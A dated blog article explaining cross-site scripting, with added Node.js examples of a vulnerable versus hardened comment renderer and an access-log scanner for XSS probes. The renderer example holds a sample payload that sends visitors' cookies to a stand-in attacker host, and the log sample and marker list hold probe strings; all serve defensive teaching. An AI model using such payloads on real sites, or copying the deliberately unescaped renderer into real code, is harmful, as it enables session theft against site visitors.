
Beware The Dangers Of Cross Site Scripting – XSS

Jan 14th 2014

Cross-site scripting, or XSS, is a popular attack vector, but why is it such a problem and what can you do to avoid becoming a victim?

Basically, XSS is a vulnerability in a website's code that allows an attacker to inject malicious client-side script into a page the site serves to other users. When you visit a page carrying an XSS payload, your browser runs that script as though the site itself had sent it: it can copy your session cookie and other personal information the page can see, perform actions on the site as you, redirect you to a page that serves malware, or use your browser to take part in further attacks.

Most people never look at the scripts behind a website, but understanding the ramifications of XSS is extremely important given the popularity of wikis and other web 2.0 content that is constantly updated and changed. To be interactive, such sites accept a high degree of input from their users, and the spaces that hold that content, comment boxes and the like, are exactly where an attacker can inject code that will run in every visitor's browser, whether to push malware at them or to recruit their machine into an attack. An "open" area of a website that anyone can write to is hard to monitor, so owners have to continually review what is being published on their pages.

XSS payloads can be planted in the page body, in banner ads served by a third party, or even in a URL that the site reflects back to the visitor; on a site that people visit regularly, users will as good as hand themselves over to the attacker. Because XSS runs on the client side, the injected script has everything the site's own JavaScript has in that browser: the contents of the page, any cookie not marked HttpOnly (which often includes the session cookie that keeps the user logged in), and the ability to send requests to the site as that user.

One of the real concerns about XSS is that a script delivered this way can turn each visitor's browser into an attack node: for as long as the page is open, the script can fire requests at a third-party target, so the site's audience takes part in a denial of service attack without any malware being installed and without the users being aware of it. Enslaving the endpoint into a botnet proper, a group of computers infected with malware so that a third party controls them, takes a further step, such as redirecting the visitor to a browser exploit or tricking them into running a download, but XSS is a common first stage for exactly that.

The range of what can be accomplished is huge: malware can be served from a legitimate website, turning it into a watering hole that infects its visitors' computers, and this can affect anyone. Once the XSS is in place on a website, every visitor becomes a victim, and the attacker has access to everything the browser exposes to that page.

In terms of prevention, the first task is to close the hole in the website that was exploited. The main tactic against XSS is "locking all the doors": reviewing your website code regularly to remove bugs and vulnerabilities, as a continual process rather than a one-off exercise. A site that carries injected code because its owner never reviews it gives the attacker time to refine the malicious code, take over more of the page and infect more visitors.

You can limit the chances of malicious code landing on your website by routinely auditing it for unintended JavaScript inclusions. But the real fix for XSS, whether non-persistent (reflected) or persistent (stored), lies in how the application handles data: validate all incoming data against what you actually expect, do not let submitted content carry its own markup or script unless you deliberately allow a strictly limited subset, and encode every untrusted value for the context it is written into (HTML body, attribute, URL or JavaScript) before it is sent to a browser. Merely checking input for "malicious code" is not enough, because an attacker can encode a payload in ways a blacklist will miss; encoding on output makes the payload inert whatever it contains. This is especially true for parts of your website that receive regular updates, like comment sections. It is not enough to assume that because the content was clean before, new submissions will also be clean.
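As an added example, not code from the original article, here is a small Node.js comment renderer in its vulnerable and hardened forms to show the difference between checking input and encoding output. The comment record, the attacker host `attacker.example` and the function names are constructed for the illustration; the hardened version also allowlists the link scheme, since HTML encoding alone would leave a `javascript:` link executable.

```javascript
// Added example, not code from the original article. A comment record as a
// site might store it; the values are constructed to show the attack.
const comment = {
  author: 'Mallory',
  // Sends the visitor's cookies to the attacker by loading an image from their host.
  body: '<script>new Image().src="http://attacker.example/c?"+encodeURIComponent(document.cookie)</script>',
  // A link whose "URL" is itself a script.
  link: 'javascript:alert(document.cookie)',
};

// VULNERABLE: untrusted fields are concatenated straight into the HTML, so
// the browser treats Mallory's markup as part of the page.
function renderCommentVulnerable(c) {
  return `<div class="comment"><a href="${c.link}">${c.author}</a>: ${c.body}</div>`;
}

// Output encoding for HTML text and double-quoted attribute values. Each
// metacharacter becomes a character reference, so the browser displays it
// instead of parsing it.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Links are a separate context: encoding alone would leave
// href="javascript:..." executable, so the scheme is allowlisted instead.
// Anything that is not http(s), or does not parse as a URL, is rejected.
function safeHref(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch {
    return null;
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:' ? parsed.href : null;
}

// HARDENED: every untrusted value is encoded for the context it lands in,
// and the link is dropped unless it passes the allowlist.
function renderCommentHardened(c) {
  const name = escapeHtml(c.author);
  const href = safeHref(c.link);
  const who = href ? `<a href="${escapeHtml(href)}">${name}</a>` : name;
  return `<div class="comment">${who}: ${escapeHtml(c.body)}</div>`;
}

// Rough check used only to compare the two renderers: does the HTML still
// contain an executable script element or a javascript: link?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /href="javascript:/i.test(html);
}

console.log('vulnerable:', renderCommentVulnerable(comment));
console.log('hardened:  ', renderCommentHardened(comment));
```

Run it with `node`. The hardened output shows Mallory's script as literal text and drops the link entirely. Note that this covers only the HTML body and attribute contexts; a value written inside a `<script>` block or an inline event handler needs JavaScript-string encoding instead, and a Content-Security-Policy header that disallows inline script is a worthwhile second layer for the cases encoding misses.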

Even if you follow secure coding practice and go through code reviews, websites sometimes sit for six months with no changes made, so vulnerability testing is important because new bugs will continue to surface. Remember that HTTP and HTML were designed in the early 1990s as a way to share documents; nobody imagined they would carry the applications they carry today, and the resulting mix of markup, script and user data is full of potential vulnerabilities. If you do not consider XSS when writing a website, you will inevitably write one full of holes.

Top three tips to avoid becoming a victim of XSS:

  1. Review your website code regularly and make sure every piece of user-supplied data is encoded for the context it appears in, so there are no holes where code can be inserted.
  2. Consider not allowing comments to carry external links, or approve links before they are published and restrict them to http and https, so that a link cannot itself be a javascript: payload.
  3. Watch your web traffic in and out of the website for signs of unusual behaviour, such as requests carrying script fragments in their parameters or a sudden stream of requests from your pages to a single outside destination.
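For tip 3, here is an added example, not from the original article, of looking at inbound web traffic for XSS probes: a Node.js scan over access-log lines in the common log format that URL-decodes each request target (repeatedly, so double-encoded payloads are caught) and flags the markers that rarely appear in legitimate query strings. The five log lines, the addresses from the documentation IP ranges and the marker list are all constructed for the illustration.

```javascript
// Added example, not code from the original article. Constructed access-log
// lines: one normal search, a reflected <script> probe, a double-encoded
// <img onerror> probe, an unrelated POST and a javascript: URI probe.
const SAMPLE_LOG = `
203.0.113.7 - - [14/Jan/2014:10:01:02 +0000] "GET /search?q=router HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jan/2014:10:01:09 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
198.51.100.23 - - [14/Jan/2014:10:02:15 +0000] "GET /search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5190 "-" "curl/7.30"
198.51.100.23 - - [14/Jan/2014:10:02:30 +0000] "POST /comment HTTP/1.1" 302 0 "-" "curl/7.30"
192.0.2.9 - - [14/Jan/2014:10:03:44 +0000] "GET /profile?redirect=javascript%3Aalert(document.cookie) HTTP/1.1" 200 800 "-" "Mozilla/5.0"
`.trim();

// Common log format: client, ident, user, [timestamp], "METHOD target proto", status
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Patterns matched against the fully decoded request target. Coarse by
// design: this is a triage list, not a filter.
const XSS_MARKERS = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'event-handler', re: /\bon(?:error|load|mouseover|focus|click)\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'html-tag', re: /<\s*(?:img|svg|iframe|object|embed)\b/i },
];

// Percent-decode repeatedly so double-encoded payloads (%253C -> %3C -> <)
// are seen as the browser would eventually see them. Stops when a round
// changes nothing, when the input is malformed, or after maxRounds.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur.replace(/\+/g, ' '));
    } catch {
      break; // malformed escape sequence; keep what we have
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Returns one record per request whose decoded target matches any marker.
function findXssProbes(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    const entry = parseLine(line);
    if (!entry) continue;
    const decoded = fullyDecode(entry.target);
    const markers = XSS_MARKERS.filter((mk) => mk.re.test(decoded)).map((mk) => mk.name);
    if (markers.length > 0) {
      hits.push({ ip: entry.ip, time: entry.time, target: entry.target, decoded, markers });
    }
  }
  return hits;
}

// Number of flagged requests per client address, to spot a scanner quickly.
function countByIp(hits) {
  const counts = {};
  for (const h of hits) counts[h.ip] = (counts[h.ip] || 0) + 1;
  return counts;
}

const probes = findXssProbes(SAMPLE_LOG);
for (const p of probes) console.log(p.ip, p.time, p.markers.join(','), p.decoded);
console.log(countByIp(probes));
```

Three of the five lines are flagged, including the double-encoded one that a single pass of decoding would miss. Treat the result as a starting point for investigation rather than proof of compromise: a 200 response to a probe tells you the request was served, not whether the payload was reflected, so the next step is to fetch the same URL yourself and check the response body.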
